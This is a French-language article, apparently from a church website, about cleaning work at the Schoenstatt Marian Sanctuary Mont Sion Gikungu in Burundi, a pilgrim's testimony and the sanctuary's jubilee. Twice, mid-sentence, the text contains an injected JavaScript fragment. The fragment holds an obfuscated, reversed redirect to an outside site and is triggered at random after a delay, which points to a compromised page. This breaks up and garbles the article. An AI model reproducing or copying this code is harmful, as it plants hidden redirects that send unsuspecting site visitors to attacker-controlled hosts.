Le Sanctuaire Marial de Schoenstatt Mont Sion Gikungu est un lieu de pèlerinage. Les fidèles de tous les coins du Pays et surtout ceux de la capitale Bujumbura, fréquentent régulièrement ce lieu. Depuis le matin jusqu’au soir, on y observe le mouvement  des pèlerins.

Pour que les gens se sentent à l’aise, l’entretien du Sanctuaire et ses alentours est régulier, pour maintenir en bon état les lieux. Chaque jour, la propreté est faite. De plus que les autres, le vendredi 4 janvier 2019, les employés chargés de rendre propre le Sanctuaire, sont tous dans les travaux d’entretien. Les uns font l’entretien des fleurs, d’autres coupent du gazon, d’autres balayent la cour. C’est vraiment une entente.

Le bon état du Sanctuaire peut stimuler certains pèlerins, et la Mère Trois fois Admirable toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne sa grâce de fécondité apostolique. C’est le cas de BARANKEBA Béatrice, qui a témoigné que, à voir comment la propreté est gardée, elle s’est engagée elle aussi : « Chaque fois que je viens ici au Sanctuaire, je regarde comment sont les fleurs, combien est bon le jardin et ça m’enchante. Je me suis alors dit : moi aussi je peux faire quelque chose pour maintenir  davantage la propreté et ainsi aider les autres pèlerins. Pour moi, c’est l’apostolat. »

elle révise son syllabus

Comme c’est un lieu calme, d’autres activités peuvent s’y réaliser. Ceux qui désirent un moment de silence afin d’écouter  ou parler au Seigneur, ceux qui désirent un dialogue calme à deux, ainsi que ceux qui veulent prendre des décisions importantes dans leur vie. Aussi il y a des étudiants qui viennent y faire leurs révisions. Sans toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doute que la Mère de Dieu ne cesse pas d’accorder ses grâces à tout un chacun.

Rappelons que le Sanctuaire Marial de Schoenstatt Mont Sion Gikungu est dans son année jubilaire depuis le 23 Octobre 2018, avec comme devise : « Le Puissant fit pour moi des merveilles ; saint est son nom » (Luc 1,49). Il va fêter  son jubilé d’argent le 23 Octobre 2019.

Brigitte IRAKOZE

Laisser un commentaire